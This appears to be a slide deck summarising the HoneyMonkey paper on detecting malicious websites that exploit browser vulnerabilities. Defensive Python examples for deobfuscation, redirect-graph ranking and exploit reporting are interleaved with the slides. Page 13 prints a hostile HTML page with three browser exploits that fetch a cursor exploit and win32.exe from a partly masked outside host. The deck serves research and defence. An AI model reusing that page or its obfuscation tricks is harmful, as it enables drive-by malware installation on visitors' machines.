
Page 1:

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities

AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King

PUBLISHED IN: MICROSOFT RESEARCH, Redmond

Page 2:

PROPOSED PROBLEM

• Emerging attack: Internet attacks by malicious websites
• Exploit browser vulnerabilities
• Install malicious contents
• Use of HoneyMonkeys for a solution

Page 3:

BROWSER BASED VULNERABILITY

• Code obfuscation
• URL redirection
• Vulnerability exploitation
• Malware installation

Page 4:

CODE OBFUSCATION

Page 5:

CODE OBFUSCATION

• To escape from signature-based scanning
• Custom decoding routine included inside the script
• Unreadable long strings that are encoded and decoded later by the script or by the browser

Page 6:

ENCODED MALICIOUS CODE

Page 7:

DECODED MALICIOUS CODE

Page 8:

URL REDIRECTION

Page 9:

URL REDIRECTION

• Primary URL to secondary URL
• Protocol redirection using HTTP 302 Temporary Redirect
• HTML tags
• Script functions including window.location.replace()

Page 10:

URL REDIRECTION

[Figure: a user visits the primary URL http://[IP address]/[8 chars]/test2/iejp.htm, which redirects to the secondary URL http://[IP address]]

Page 11:

VULNERABILITY EXPLOITATION

Page 12:

VULNERABILITY EXPLOITATION

• Malicious websites attempt to exploit multiple vulnerabilities
• HTML fragments – multiple files from different URLs
• Dynamic code injection using document.write
• Trojan downloader runs after the exploits
• Most attacked browser is IE

Page 13:

EXAMPLE FOR VULNERABILITY

<html><head><title></title></head><body><style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>
<script>try{document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58;//C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){}</script></body></html>

Figure labels: Exploit 1, Exploit 2, Exploit 3 (the three exploits contained in the page above)
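The code obfuscation slides and the example above show two tricks used to defeat signature scanning: numeric character references (&#NNN, with the semicolon omitted, which the browser still decodes) and a string split into '+'-joined pieces. The following added Python example, not part of the original presentation or of the paper's tooling, normalises a constructed snippet written in that style (placeholder domain example.invalid) so that the hidden indicators become visible to a scanner again.

```python
import re

# Constructed sample in the style of the obfuscated page shown on the slide:
# a numeric-character-reference encoded protocol prefix and a string split
# into '+'-joined pieces so that no single literal matches a signature.
SAMPLE_SCRIPT = (
    "try{document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58"
    "&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58;//"
    "C:\\fo'+'o.mht!'+'http://example'+'.invalid/targ.ch'+'m::/targ'+'et.htm`"
    " type=`text/x-scriptlet`></ob'+'ject>');}catch(e){}"
)

# Indicators a reviewer would look for once the text is normalised.
INDICATORS = ("ms-its:", "mhtml:", ".chm::", "x-scriptlet", "document.write")

_CONCAT = re.compile(r"'\s*\+\s*'")                # '...'+'...' joins
_NUMREF = re.compile(r"&#(x[0-9a-fA-F]+|\d+);?")   # &#NNN or &#xHH, ';' optional

def join_concatenations(s: str) -> str:
    """Collapse 'ab'+'cd' into 'abcd' so split keywords become visible."""
    return _CONCAT.sub("", s)

def decode_numeric_refs(s: str) -> str:
    """Decode &#NNN / &#xHH references; browsers accept a missing ';'."""
    def repl(m):
        ref = m.group(1)
        code = int(ref[1:], 16) if ref[0] in "xX" else int(ref)
        return chr(code)
    return _NUMREF.sub(repl, s)

def normalise(s: str) -> str:
    """Apply both transformations; the result is what the browser acts on."""
    return decode_numeric_refs(join_concatenations(s))

def find_indicators(s: str) -> list:
    """Return the indicators present in the normalised text, in a stable order."""
    text = normalise(s).lower()
    return [ind for ind in INDICATORS if ind in text]

if __name__ == "__main__":
    print(normalise(SAMPLE_SCRIPT))
    print(find_indicators(SAMPLE_SCRIPT))
```

Run against the raw sample, none of the indicators match; after normalisation all five do, which is why a scanner must decode before matching.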

Page 14:

Honey Monkey Exploit Detection System

• Active client-side virtual machines called honeypots
• Large-scale, systematic and automated web patrol
• It mimics human browsing
• Different patch levels and different levels of vulnerability

Page 15:

HONEYMONKEY SYSTEM

• Stage 1 – scalable mode: visit N URLs at a time.
• Stage 2 – perform recursive redirection analysis.
• Stage 3 – scan exploit URLs using fully patched VMs.

Page 16:

HONEY MONKEY SYSTEM

Page 17:

TOPOLOGY GRAPH AND NODE RANKING

• Rectangular nodes represent exploit URLs
• Arrows represent traffic redirection
• Circles represent nodes that act as an aggregation point for hosted exploit pages
• R is the most likely exploit provider
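Putting the redirection mechanisms from the URL redirection slides together with the node ranking described here, the added Python example below (not the paper's code) extracts the redirect target from constructed HTTP responses via a 302 Location header, a meta refresh tag or window.location.replace(), builds the source-to-target edge list and ranks targets by the number of distinct sources redirecting into them; hosts such as r.invalid are placeholders.

```python
import re
from collections import defaultdict

# Constructed observations: (source URL, raw HTTP response) pairs as a
# crawler such as a Honey Monkey would record them. Hosts are placeholders.
OBSERVATIONS = [
    ("http://site-a.invalid/index.htm",
     "HTTP/1.1 302 Found\r\nLocation: http://r.invalid/exploit.htm\r\n\r\n"),
    ("http://site-b.invalid/page.htm",
     "HTTP/1.1 200 OK\r\n\r\n<html><head><meta http-equiv=\"refresh\" "
     "content=\"0;url=http://r.invalid/exploit.htm\"></head></html>"),
    ("http://site-c.invalid/in.htm",
     "HTTP/1.1 200 OK\r\n\r\n<script>window.location.replace("
     "'http://r.invalid/exploit.htm');</script>"),
    ("http://site-d.invalid/x.htm",
     "HTTP/1.1 302 Found\r\nLocation: http://other.invalid/land.htm\r\n\r\n"),
]

_LOCATION = re.compile(r"^Location:\s*(\S+)", re.I | re.M)
_META = re.compile(r'<meta[^>]+content=["\']\d+;\s*url=([^"\']+)', re.I)
_SCRIPT = re.compile(r"location\.(?:replace|assign)\(\s*['\"]([^'\"]+)", re.I)

def extract_redirect(raw_response: str):
    """Return (mechanism, target) for the first redirect found, else None."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status = head.split(" ", 2)[1] if " " in head else ""
    if status.startswith("3"):              # protocol-level redirect
        m = _LOCATION.search(head)
        if m:
            return ("http-3xx", m.group(1))
    m = _META.search(body)                  # HTML tag redirect
    if m:
        return ("meta-refresh", m.group(1))
    m = _SCRIPT.search(body)                # script redirect
    if m:
        return ("script", m.group(1))
    return None

def build_topology(observations):
    """Edge list (source, target, mechanism), one edge per observed redirect."""
    edges = []
    for src, raw in observations:
        hit = extract_redirect(raw)
        if hit:
            edges.append((src, hit[1], hit[0]))
    return edges

def rank_providers(edges):
    """Rank targets by in-degree: the node most sites redirect into is the
    most likely exploit provider (the slide's node R)."""
    indeg = defaultdict(set)
    for src, dst, _ in edges:
        indeg[dst].add(src)
    return sorted(((dst, len(s)) for dst, s in indeg.items()),
                  key=lambda t: (-t[1], t[0]))
```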

Page 18:

TOPOLOGY GRAPH AND NODE RANKING

Page 19:

GENERATING URL LISTS

• Suspicious URLs
• Popular websites – if attacked, they potentially attack a larger population
• Localized-space websites

Page 20:

Exploit Detection Report

• Executable files created or modified outside the browser sandbox folders
• Processes created
• Windows registry entries created or modified
• Vulnerability exploited
• Redirect URLs visited
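As an added illustration of how such a report can be assembled from monitor events (example code, not the Strider tracer or the paper's implementation), the Python below classifies a constructed Windows event log against assumed sandbox folders and executable suffixes. The paths, process names and the rule that only processes spawned by iexplore.exe count are assumptions.

```python
from pathlib import PureWindowsPath

# Folders the browser is allowed to write to during normal browsing (assumed
# Windows XP era profile paths). Any executable created elsewhere is treated
# as a sign of a successful exploit.
SANDBOX_DIRS = [
    r"C:\Documents and Settings\user\Local Settings\Temporary Internet Files",
    r"C:\Documents and Settings\user\Cookies",
]
EXECUTABLE_SUFFIXES = {".exe", ".dll", ".sys", ".scr", ".com"}
BROWSER_PROCESS = "iexplore.exe"   # assumed: only children of the browser count

# Constructed event log as a kernel-level recorder might emit it:
# (event type, subject process, object path or key). All names are placeholders.
EVENTS = [
    ("file_write", "iexplore.exe",
     r"C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\ad[1].htm"),
    ("file_write", "iexplore.exe", r"C:\WINDOWS\system32\dropper.exe"),
    ("process_create", "iexplore.exe", r"C:\WINDOWS\system32\dropper.exe"),
    ("registry_set", "dropper.exe",
     r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\updater"),
]

def _inside(path: str, folder: str) -> bool:
    """Case-insensitive containment check, matching how NTFS compares paths."""
    p = PureWindowsPath(path.lower())
    return PureWindowsPath(folder.lower()) in p.parents

def is_suspicious_file(path: str) -> bool:
    """Executable written outside every sandbox folder."""
    if PureWindowsPath(path).suffix.lower() not in EXECUTABLE_SUFFIXES:
        return False
    return not any(_inside(path, d) for d in SANDBOX_DIRS)

def build_report(events):
    """Group events into the categories of the exploit detection report."""
    report = {"files": [], "processes": [], "registry": []}
    for kind, subject, obj in events:
        if kind == "file_write" and is_suspicious_file(obj):
            report["files"].append(obj)
        elif kind == "process_create" and subject.lower() == BROWSER_PROCESS:
            report["processes"].append(obj)
        elif kind == "registry_set":
            report["registry"].append(obj)
    # A file drop or a spawned process is the exploit signal; registry
    # changes are recorded for the analyst but do not decide on their own.
    report["exploited"] = bool(report["files"] or report["processes"])
    return report
```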

Page 21:

Patch level statistics

Page 22:

RESULTS

Page 23:

Page 24:

ADVANTAGES

• Automatic
• Scalable
• Non-signature-based approach
• Stage-wise detection

Page 25:

DISADVANTAGES

• Exploiters may randomize the attack, confusing the honey monkeys
• Exploiters were able to detect honey monkeys by showing a dialog box
• They didn't explain topology graphs very clearly

Page 26:

IMPROVEMENTS

• They need to work on accuracy
• They need more classification according to contents
• They should improve the honey monkeys' ability to avoid detection